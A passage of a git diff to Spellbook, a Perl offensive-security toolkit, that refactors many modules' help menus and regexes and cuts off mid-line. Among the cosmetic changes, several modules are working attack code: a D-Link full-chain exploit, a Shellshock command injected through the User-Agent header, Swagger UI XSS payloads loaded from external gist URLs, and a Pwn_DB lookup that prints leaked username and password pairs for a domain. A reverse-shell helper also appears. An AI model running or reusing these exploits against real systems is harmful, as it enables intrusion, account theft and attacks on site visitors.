Spellbook::Exploit::Fullchain_DLINK { "Connection" => "keep-alive" ); - my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload); + my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $login_payload); my $response = $userAgent -> request($request); - - if ($response -> is_success) { + + if ($response -> is_success) { my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ "--target" => $target, "--cookie" => "zwUEueUOvi", "--payload" => "uname -a" ]); - + if ($exploit[0] ne "Authenication fail") { push @results, @exploit; } @@ -69,12 +69,15 @@ package Spellbook::Exploit::Fullchain_DLINK { } if ($help) { - return " - \rExploit::Fullchain_DLINK - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-p, --payload Send a command\n\n"; + return<<"EOT"; + +Exploit::Fullchain_DLINK +======================= +-h, --help See this menu +-t, --target Define a target +-p, --payload Send a command\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/HAProxy_Exposed.pm b/lib/Spellbook/Exploit/HAProxy_Exposed.pm index b40ca6c..1ccdb33 100644 --- a/lib/Spellbook/Exploit/HAProxy_Exposed.pm +++ b/lib/Spellbook/Exploit/HAProxy_Exposed.pm @@ -1,7 +1,7 @@ package Spellbook::Exploit::HAProxy_Exposed { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,14 +14,17 @@ package Spellbook::Exploit::HAProxy_Exposed { if ($target) { return @result; - } + } if ($help) { - return " - \rExploit::HAProxy_Exposed - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Exploit::HAProxy_Exposed +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Headers_Misconfig.pm b/lib/Spellbook/Exploit/Headers_Misconfig.pm index fa75e01..168352c 100644 --- a/lib/Spellbook/Exploit/Headers_Misconfig.pm +++ b/lib/Spellbook/Exploit/Headers_Misconfig.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Headers_Misconfig { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -35,16 +35,19 @@ package Spellbook::Exploit::Headers_Misconfig { push @results, "$target don't have $header header."; } } - + return @results; } if ($help) { - return " - \rExploit::Headers_Misconfig - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::Headers_Misconfig +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Mixed_Content.pm b/lib/Spellbook/Exploit/Mixed_Content.pm index c54967a..211bfbc 100644 --- a/lib/Spellbook/Exploit/Mixed_Content.pm +++ b/lib/Spellbook/Exploit/Mixed_Content.pm @@ -2,7 +2,7 @@ package Spellbook::Exploit::Mixed_Content { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result, @urls); @@ -15,18 +15,18 @@ package Spellbook::Exploit::Mixed_Content { if ($target) { if ($target =~ /^http:\/\//x) { - $target =~ s/^http:\/\///x; + $target =~ s/^http:\/\///x; } - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new (); my $request = $userAgent -> get($target); for (($request -> content =~ /src="([^"]+)"/gx) || ($request -> content =~ /href="([^"]+)"/gx)){ - push @urls, $1; + push @urls, $1; } foreach my $url (@urls) { @@ -36,15 +36,17 @@ package Spellbook::Exploit::Mixed_Content { } return @result; - } + } if ($help) { - return " - \rExploit::Mixed_Content - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target to perform the analysis\n - "; + return<<"EOT"; + +Exploit::Mixed_Content +===================== +-h, --help See this menu +-t, --target Define a target to perform the analysis\n; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/None_Attack.pm b/lib/Spellbook/Exploit/None_Attack.pm index dfc794b..4ae6efe 100644 --- a/lib/Spellbook/Exploit/None_Attack.pm +++ b/lib/Spellbook/Exploit/None_Attack.pm @@ -1,8 +1,8 @@ package Spellbook::Exploit::None_Attack { use strict; use warnings; - - sub new { + + sub new { my ($self, $parameters) = @_; my ($help, @result); @@ -13,13 +13,16 @@ package Spellbook::Exploit::None_Attack { if (1) { return @result; - } + } if ($help) { - return " - \rExploit::None_Attack - \r===================== - \r-h, --help See this menu\n\n"; + return<<"EOT"; + +Exploit::None_Attack +===================== +-h, --help See this menu\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Pwn_DB.pm b/lib/Spellbook/Exploit/Pwn_DB.pm index a3a976b..64fa9a8 100644 --- a/lib/Spellbook/Exploit/Pwn_DB.pm +++ b/lib/Spellbook/Exploit/Pwn_DB.pm @@ -17,7 +17,7 @@ package Spellbook::Exploit::Pwn_DB { if ($target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> post( - "https://pwndb2am4tzkvold.tor2web.io/", + "https://pwndb2am4tzkvold.tor2web.io/", Content => "luser=&domain=$target&luseropr=0&domainopr=0&submitform=em" ); @@ -29,19 +29,21 @@ package Spellbook::Exploit::Pwn_DB { while ($content =~ /\[luser\] => ([^\n]+)[^\)]+\[password\] => ([^\n]+)/mgx) { if ($1 ne "donate") { print "$1\@$target:$2\n"; - } + } } - } + } } } - + if ($help) { - return " - \rExploit::Pwn_DB - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n - "; + return<<"EOT"; + +Exploit::Pwn_DB +======================= +-h, --help See this menu +-t, --target Define a target\n; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Redis_Unauth.pm b/lib/Spellbook/Exploit/Redis_Unauth.pm index afb0625..a055494 100644 --- a/lib/Spellbook/Exploit/Redis_Unauth.pm +++ b/lib/Spellbook/Exploit/Redis_Unauth.pm @@ -3,7 +3,7 @@ package Spellbook::Exploit::Redis_Unauth { use warnings; use Redis; use Try::Tiny; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -21,27 +21,30 @@ package Spellbook::Exploit::Redis_Unauth { try { my $redis = Redis -> new ( - server => $target, + server => $target, name => "Spellbook", cnx_timeout => 45 ); - + my $requirepass = $redis -> config_get ("requirepass") -> [1]; - + if (!defined($requirepass) || $requirepass eq "") { push @result, $target; } }; return @result; - } + } if ($help) { - return " - \rExploit::Redis_Exposed - \r===================== - \r-h, --help See this menu - \r-t, --target Set a target to detect misconfigurations\n\n"; + return<<"EOT"; + +Exploit::Redis_Exposed +===================== +-h, --help See this menu +-t, --target Set a target to detect misconfigurations\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Reflected_XSS.pm b/lib/Spellbook/Exploit/Reflected_XSS.pm index 59beaad..2e66736 100644 --- a/lib/Spellbook/Exploit/Reflected_XSS.pm +++ b/lib/Spellbook/Exploit/Reflected_XSS.pm @@ -31,7 +31,7 @@ package Spellbook::Exploit::Reflected_XSS { $params -> remove($name); $params -> append($name, $payload); - + $parsed_url -> query($params); try { @@ -47,16 +47,19 @@ package Spellbook::Exploit::Reflected_XSS { } } } - + return @result; } if ($help) { - return " - \rExploit::Reflected_XSS - \r===================== - \r-h, --help See this menu - \r-t, --target Set an website to see paths from WayBackMachine\n"; + return<<"EOT"; + +Exploit::Reflected_XSS +===================== +-h, --help See this menu +-t, --target Set an website to see paths from WayBackMachine\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm index 2a353b1..60cce59 100644 --- a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm +++ b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm @@ -14,7 +14,7 @@ package Spellbook::Exploit::S3_Bucket_Takeover { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -29,14 +29,17 @@ package Spellbook::Exploit::S3_Bucket_Takeover { } return @result; - } + } if ($help) { - return " - \rExploit::S3_Bucket_Takeover - \r===================== - \r-h, --help See this menu - \r-t, --target Check the possibility to takeover an s3 resource\n"; + return<<"EOT"; + +Exploit::S3_Bucket_Takeover +===================== +-h, --help See this menu +-t, --target Check the possibility to takeover an s3 resource\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Shellshock.pm b/lib/Spellbook/Exploit/Shellshock.pm index 3b2e4a9..870e30f 100644 --- a/lib/Spellbook/Exploit/Shellshock.pm +++ b/lib/Spellbook/Exploit/Shellshock.pm @@ -19,7 +19,7 @@ package Spellbook::Exploit::Shellshock { agent => "() { :; }; echo; echo; /bin/bash -c 'ls'" ); - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -31,12 +31,15 @@ package Spellbook::Exploit::Shellshock { } if ($help) { - return " - \rExploit::Shellshock - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target - \r-c, --command Define a command to delivery\n\n"; + return<<"EOT"; + +Exploit::Shellshock +===================== +-h, --help See this menu +-t, --target Define a target +-c, --command Define a command to delivery\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Subdomain_Takeover.pm b/lib/Spellbook/Exploit/Subdomain_Takeover.pm index 1b1832a..43e250e 100644 --- a/lib/Spellbook/Exploit/Subdomain_Takeover.pm +++ b/lib/Spellbook/Exploit/Subdomain_Takeover.pm @@ -9,65 +9,71 @@ package Spellbook::Exploit::Subdomain_Takeover { my ($self, $parameters) = @_; my ($help, $target, @results); - Getopt::Long::GetOptionsFromArray ( + my %service_fingerprints = ( + "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", + "1eb970ce5a18bec7165f016df8238566" => "github.github.io", + "387caa8a924c5f92496824494b929207" => "heroku.com", + "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", + "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", + "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", + "308be540e2821668fb15c42317b1a256" => "wpengine.com", + "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", + "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", + "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", + "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", + ); + + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($target) { - $target =~ s/^http(s)?:\/\///x; - - my $resolv = Net::DNS::Resolver -> new(); - my $reply = $resolv -> search($target); - - if ($reply) { - $target = "https://$target"; - - foreach my $rr ($reply -> answer()) { - if ($rr -> can("cname")) { - my %hashes = ( - "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", - "1eb970ce5a18bec7165f016df8238566" => "github.github.io", - "387caa8a924c5f92496824494b929207" => "heroku.com", - "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", - "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", - "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", - "308be540e2821668fb15c42317b1a256" => "wpengine.com", - "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", - "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", - "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", - "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", - # "9043fb5164b8a1a5fea8031025fe9ef8" => "firebase", - # "648e671c67c7aee4eae2918e7cfbf5e4" => "squarespace.com" - ); - - foreach (%hashes) { - if ($rr -> cname() =~ m/$_/x) { - my $useragent = Spellbook::Core::UserAgent -> new(); - my $request = $useragent -> get($target); - - if ($request -> code() == 200 || $request -> code() == 404) { - my $md5 = md5_hex($request -> content()); - - return @results, $target if $hashes{$md5}; - } - } - } + if ($help) { + return <<"EOT"; + +Exploit::Subdomain_Takeover_Check +============== +-h, --help See this menu +-t, --target Define a target + +EOT + } + + return @results unless $target; + + $target =~ s/^http(s)?:\/\///x; + + my $resolv = Net::DNS::Resolver->new(); + my $reply = $resolv->search($target); + + return @results unless $reply; + + $target = "https://$target"; + + foreach my $dns_resource ($reply->answer()) { + next unless $dns_resource->can("cname"); + + my $cname = $dns_resource->cname(); + + while (my ($hash, $service) = each %service_fingerprints) { + next unless $cname =~ m/$service/x; + + my $useragent = Spellbook::Core::UserAgent->new(); + my $response = $useragent->get($target); + + if ($response->code() == 200 || $response->code() == 404) { + my $content_hash = md5_hex($response->content()); + + if ($hash eq $content_hash) { + push @results, $target; + last; } } } - - return @results; } - if ($help) { - return " - \rExploit::Subdomain_Takeover_Check - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; - } + return @results; } } diff --git a/lib/Spellbook/Exploit/Swagger_XSS.pm b/lib/Spellbook/Exploit/Swagger_XSS.pm index 4fd032c..4972d0c 100644 --- a/lib/Spellbook/Exploit/Swagger_XSS.pm +++ b/lib/Spellbook/Exploit/Swagger_XSS.pm @@ -1,71 +1,67 @@ package Spellbook::Exploit::Swagger_XSS { + use strict; use warnings; use Spellbook::Core::UserAgent; sub new { my ($self, $parameters) = @_; - my ($help, $target, @result); + my ($help, $target, @vulnerable_endpoints); - Getopt::Long::GetOptionsFromArray ( + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; - } - - $target =~ s/\/$//x; - my $useragent = Spellbook::Core::UserAgent -> new(); - - my @paths = ( - "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", "/api/swagger", "/api/swagger-ui", "/api/swagger.json", - "/api/v2/api-docs", "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", "/docs/v2/api-docs", - "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", - "/api/v2/swagger-ui.html", "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" - ); - - foreach my $path (@paths) { - my $request = $useragent -> get("$target$path"); - - if ($request -> code() == 200) { - if ($request -> content() =~ /(.*)<\/title>/x) { - my $title = $1; - - if ($title =~ /Swagger UI/x) { - my @payloads = ( - "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", - "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" - ); - - foreach my $payload (@payloads) { - my $endpoint = $target . $path . $payload; - my $request = $useragent -> get($endpoint); - - if ($request -> code() == 200) { - push @result, $endpoint; - } - } - } - } - } - } + if ($help) { + return <<"EOT"; +Exploit::Swagger_XSS +===================== +-h, --help See this menu +-t, --target Set a target - return @result; +EOT } - if ($help) { - return " - \rExploit::Swagger_XSS - \r===================== - \r-h, --help See this menu - \r-t, --target Set a target\n\n"; + return 0 unless $target; + + $target = "https://$target" unless $target =~ /^http(?:s)?:\/\//x; + $target =~ s/\/$//x; + + my $useragent = Spellbook::Core::UserAgent->new(); + + my @paths = ( + "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", + "/api/swagger", "/api/swagger-ui", "/api/swagger.json", "/api/v2/api-docs", + "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", + "/docs/v2/api-docs", "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", + "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", "/api/v2/swagger-ui.html", + "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" + ); + + my @payloads = ( + "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", + "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" + ); + + foreach my $path (@paths) { + my $base_url = "$target$path"; + my $initial_response = $useragent->get($base_url); + + next unless $initial_response->code() == 200; + next unless $initial_response->content() =~ /<title>(.*)<\/title>/x; + next unless $1 =~ /Swagger UI/; + + foreach my $payload (@payloads) { + my $test_url = $base_url . $payload; + my $test_response = $useragent->get($test_url); + + push @vulnerable_endpoints, $test_url if $test_response->code() == 200; + } } - - return 0; + + return @vulnerable_endpoints; } } diff --git a/lib/Spellbook/Exploit/Upload_Via_PUT.pm b/lib/Spellbook/Exploit/Upload_Via_PUT.pm index 53a4f67..6829372 100644 --- a/lib/Spellbook/Exploit/Upload_Via_PUT.pm +++ b/lib/Spellbook/Exploit/Upload_Via_PUT.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Upload_Via_PUT { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -32,11 +32,14 @@ package Spellbook::Exploit::Upload_Via_PUT { } if ($help) { - return " - \rRecon::Explioit - \r===================== - \r-h, --help See this menu - \r-t, --target Define\n\n"; + return<<"EOT"; + +Recon::Explioit +===================== +-h, --help See this menu +-t, --target Define\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/CDN_Checker.pm b/lib/Spellbook/Helper/CDN_Checker.pm index 686884c..caa1bd5 100644 --- a/lib/Spellbook/Helper/CDN_Checker.pm +++ b/lib/Spellbook/Helper/CDN_Checker.pm @@ -7,54 +7,52 @@ package Spellbook::Helper::CDN_Checker { use Spellbook::Recon::Get_IP; sub new { - my ($self, $parameters) = @_; - my ($help, $target, @result); + my ($self, $parameters) = @_; + my ($help, $target, @result); - Getopt::Long::GetOptionsFromArray ( - $parameters, - "h|help" => \$help, - "t|target=s" => \$target - ); + Getopt::Long::GetOptionsFromArray ( + $parameters, + "h|help" => \$help, + "t|target=s" => \$target + ); + + return <<"EOT" if $help; + +Helper::CDN_Checker +===================== +-h, --help See this menu +-t --target Define a target\n\n"; + +EOT + + return 0 unless $target; - if ($target) { my $ip = Spellbook::Recon::Get_IP -> new (["--target" => $target]); + return 0 unless $ip; + + my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; + my $useragent = Spellbook::Core::UserAgent -> new (); + my $request = $useragent -> get($cnd_list); + + return 0 unless $request->code == 200; - if ($ip) { - my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; - my $useragent = Spellbook::Core::UserAgent -> new (); - my $request = $useragent -> get($cnd_list); - - if ($request -> code == 200) { - my $data = decode_json($request -> content); - my $content = $data -> {"cdn"}; # we have others options - - for (keys %{$content}) { - for (@{$content -> {$_}}) { - my $range = Net::IP -> new($_); - my $value = Net::IP -> new($ip); - my $match = $range -> overlaps($value); - - if ($match) { - push @result, $target; - } - } + my $data = decode_json($request -> content); + my $content = $data -> {"cdn"}; # we have others options + + my $target_ip = Net::IP->new($ip); + + for my $provider (keys %{$content}) { + for my $range (@{$content->{$provider}}) { + my $cdn_range = Net::IP->new($range); + if ($cdn_range->overlaps($target_ip)) { + push @result, $target; + return @result; } } } return @result; } - - if ($help) { - return " - \rHelper::CDN_Checker - \r===================== - \r-h, --help See this menu - \r-t --target Define a target\n\n"; - } - - return 0; - } } 1; \ No newline at end of file diff --git a/lib/Spellbook/Helper/Exifs_Write.pm b/lib/Spellbook/Helper/Exifs_Write.pm index ea7fb0b..efe40a5 100755 --- a/lib/Spellbook/Helper/Exifs_Write.pm +++ b/lib/Spellbook/Helper/Exifs_Write.pm @@ -44,12 +44,15 @@ package Spellbook::Helper::Exifs_Write { } if ($help) { - return " - \rHelper::Exifs_Write - \r===================== - \r-h, --help See this menu - \r-f, --file Define a file write the payload - \r-p --payload Set a payload to write into file\n\n"; + return<<"EOT"; + +Helper::Exifs_Write +===================== +-h, --help See this menu +-f, --file Define a file write the payload +-p --payload Set a payload to write into file\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Generate_UUID.pm b/lib/Spellbook/Helper/Generate_UUID.pm index eeb9157..e80b5c6 100644 --- a/lib/Spellbook/Helper/Generate_UUID.pm +++ b/lib/Spellbook/Helper/Generate_UUID.pm @@ -19,20 +19,23 @@ package Spellbook::Helper::Generate_UUID { if ($version) { for (my $i = 1; $i <= $repeat; $i++) { my $generate = create_uuid_as_string($version); - + push @result, $generate; } - + return @result; } if ($help) { - return " - \rHelper::Generate_UUID - \r===================== - \r-h, --help See this menu - \r-v, --version Version of UUID algorithm - \r-r, --repeat Quantities of repetitions\n\n"; + return<<"EOT"; + +Helper::Generate_UUID +===================== +-h, --help See this menu +-v, --version Version of UUID algorithm +-r, --repeat Quantities of repetitions\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Host_Normalization.pm b/lib/Spellbook/Helper/Host_Normalization.pm index a786063..cf234e4 100644 --- a/lib/Spellbook/Helper/Host_Normalization.pm +++ b/lib/Spellbook/Helper/Host_Normalization.pm @@ -14,7 +14,7 @@ package Spellbook::Helper::Host_Normalization { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -34,11 +34,14 @@ package Spellbook::Helper::Host_Normalization { } if ($help) { - return " - \rHelper::Host_Normalization - \r========================== - \r-h, --help See this menu - \r-t, --target Define a target to normalize\n\n"; + return<<"EOT"; + +Helper::Host_Normalization +========================== +-h, --help See this menu +-t, --target Define a target to normalize\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Permutations.pm b/lib/Spellbook/Helper/Permutations.pm index cc615cd..1344ab5 100644 --- a/lib/Spellbook/Helper/Permutations.pm +++ b/lib/Spellbook/Helper/Permutations.pm @@ -25,20 +25,23 @@ package Spellbook::Helper::Permutations { $chars[$i] = $chars[$random]; $chars[$random] = $temp; } - + push @result, join("", @chars); } - - return @result; + + return @result; } if ($help) { - return " - \rHelper::Permutations - \r===================== - \r-h, --help See this menu - \r-v, --value Provide a seed - \r-r, --repeat Quantities of repetitions\n\n"; + return<<"EOT"; + +Helper::Permutations +===================== +-h, --help See this menu +-v, --value Provide a seed +-r, --repeat Quantities of repetitions\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Read_File.pm b/lib/Spellbook/Helper/Read_File.pm index a0c7ac8..cc39cba 100644 --- a/lib/Spellbook/Helper/Read_File.pm +++ b/lib/Spellbook/Helper/Read_File.pm @@ -2,12 +2,13 @@ package Spellbook::Helper::Read_File { use strict; use warnings; use Spellbook::Core::Module; + use Carp qw(croak); sub new { - my ($self, $parameters)= @_; + my ($self, $parameters) = @_; my ($help, $file, $entrypoint, @result); - Getopt::Long::GetOptionsFromArray ( + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "f|file=s" => \$file, @@ -15,36 +16,36 @@ package Spellbook::Helper::Read_File { ); if ($file) { - open (my $filename, "<", $file); + local $/ = "\n"; + open my $fh, "<", $file or croak "Failed to open file: $!"; + my @lines = <$fh>; + close $fh; - while (<$filename>) { - chomp ($_); + for my $line (@lines) { + chomp($line); if ($entrypoint) { - my $return = Spellbook::Core::Module -> new ($entrypoint, ["--target" => $_]); - + my $return = Spellbook::Core::Module->new($entrypoint, ["--target" => $line]); if ($return) { - push @result, $_; + push @result, $line; } } - else { - push @result, $_; + push @result, $line; } } - - close ($filename); - return @result; } - - return " - \rHelper::Read_File - \r===================== - \r-h, --help See this menu - \r-f, --file Define a file to read - \r-e, --entrypoint Set a other module to send the output\n\n"; + return <<"EOT"; + +Helper::Read_File +===================== +-h, --help See this menu +-f, --file Define a file to read +-e, --entrypoint Set a other module to send the output + +EOT } } diff --git a/lib/Spellbook/Helper/Reverse_Shell.pm b/lib/Spellbook/Helper/Reverse_Shell.pm index 5e7c3ae..e5a22d1 100644 --- a/lib/Spellbook/Helper/Reverse_Shell.pm +++ b/lib/Spellbook/Helper/Reverse_Shell.pm @@ -6,7 +6,7 @@ package Spellbook::Helper::Reverse_Shell { sub new { my ($self, $parameters) = @_; my ($help, $target); - + my $port = 1337; my $lang = "perl"; @@ -28,15 +28,18 @@ package Spellbook::Helper::Reverse_Shell { } if ($help) { - return " - \rHelper::Reverse_Shell - \r===================== - \r-h, --help See this menu - \r-t, --target Set your IP/Host to send the reverse shell - \r-p, --port Define a port to connect - \r-l, --lang Default is perl, types avaible: perl, bash\n\n"; + return<<"EOT"; + +Helper::Reverse_Shell +===================== +-h, --help See this menu +-t, --target Set your IP/Host to send the reverse shell +-p, --port Define a port to connect +-l, --lang Default is perl, types avaible: perl, bash\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Helper/Scope.pm b/lib/Spellbook/Helper/Scope.pm index 79de620..4320c8d 100644 --- a/lib/Spellbook/Helper/Scope.pm +++ b/lib/Spellbook/Helper/Scope.pm @@ -42,16 +42,16 @@ package Spellbook::Helper::Scope { push @results, $info; } } - + if ($save) { if ($keep && exists $yamlfile->[0]->{$save}) { push @{$yamlfile->[0]->{$save}}, @results; } - + else { $yamlfile->[0]->{$save} = [@results]; } - + $yamlfile->write($scope); } @@ -59,17 +59,20 @@ package Spellbook::Helper::Scope { } if ($help) { - return " - \rHelper::Scope - \r===================== - \r-h, --help See this menu - \r-S, --scope Define a YML file as a scope - \r-i, --information Set an information to extract from your scope - \r-e, --entrypoint Send informations to another entrypoint module - \r-K, --keep Keep the current values in the file and add news values - \r--save Save the output on some attribute\n\n"; + return<<"EOT"; + +Helper::Scope +===================== +-h, --help See this menu +-S, --scope Define a YML file as a scope +-i, --information Set an information to extract from your scope +-e, --entrypoint Send informations to another entrypoint module +-K, --keep Keep the current values in the file and add news values +--save Save the output on some attribute\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Helper/Uniq.pm b/lib/Spellbook/Helper/Uniq.pm index d4f81a2..7541696 100644 --- a/lib/Spellbook/Helper/Uniq.pm +++ b/lib/Spellbook/Helper/Uniq.pm @@ -17,11 +17,14 @@ package Spellbook::Helper::Uniq { } if ($help) { - return " - \rHelper::Uniq - \r===================== - \r-h, --help See this menu - \r-v, --target Define a value\n\n"; + return<<"EOT"; + +Helper::Uniq +===================== +-h, --help See this menu +-v, --target Define a value\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Nmap.pm b/lib/Spellbook/Parser/Nmap.pm index 6127b7b..2f464f0 100644 --- a/lib/Spellbook/Parser/Nmap.pm +++ b/lib/Spellbook/Parser/Nmap.pm @@ -2,7 +2,7 @@ package Spellbook::Parser::Nmap { use strict; use warnings; use XML::Simple; - + # https://metacpan.org/pod/Nmap::Parser sub new { @@ -18,14 +18,14 @@ package Spellbook::Parser::Nmap { if ($file) { my $xml = XML::Simple -> new(); my $data = $xml -> XMLin($file); - + my $host = $data -> {host} -> {address} -> {addr}; - + # foreach my $content (@{$data -> {host} -> {ports} -> {port}}) { # print Dumper($content); # push @result, $element -> {Key}; # } - + # my $state = $content -> {state} -> {state}; # if (($state eq "open") || ($state eq "filtered")) { @@ -36,16 +36,19 @@ package Spellbook::Parser::Nmap { # push @results, "$host -> [$protocol] | [$state]-> $port \t | $service\n"; # } # }; - + return @results; } if ($help) { - return " - \rParser::Nmap - \r===================== - \r-h, --help See this menu - \r-f, --file Set an XML file from Nmap output\n\n"; + return<<"EOT"; + +Parser::Nmap +===================== +-h, --help See this menu +-f, --file Set an XML file from Nmap output\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Nozaki.pm b/lib/Spellbook/Parser/Nozaki.pm index 36f9551..fed200a 100644 --- a/lib/Spellbook/Parser/Nozaki.pm +++ b/lib/Spellbook/Parser/Nozaki.pm @@ -25,11 +25,14 @@ package Spellbook::Parser::Nozaki { } if ($help) { - return " - \rParser::Nozaki - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Nozaki +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/S3_Bucket.pm b/lib/Spellbook/Parser/S3_Bucket.pm index acdd4aa..16288ba 100644 --- a/lib/Spellbook/Parser/S3_Bucket.pm +++ b/lib/Spellbook/Parser/S3_Bucket.pm @@ -16,10 +16,10 @@ package Spellbook::Parser::S3_Bucket { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; + if ($target !~ /^http(?:s)?:\/\//x) { + $target = "https://$target"; } - + if ($target !~ /\/$/x) { $target .= "/"; } my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -35,16 +35,19 @@ package Spellbook::Parser::S3_Bucket { } } } - + return @result; } if ($help) { - return " - \rParser::Bucket - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Parser::Bucket +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Parser/Sitemap.pm b/lib/Spellbook/Parser/Sitemap.pm index 8ffb154..48c2ad7 100644 --- a/lib/Spellbook/Parser/Sitemap.pm +++ b/lib/Spellbook/Parser/Sitemap.pm @@ -15,7 +15,7 @@ package Spellbook::Parser::Sitemap { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { $target = "https://$target"; } + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } if ($target !~ /\/sitemap.xml$/x) { $target = 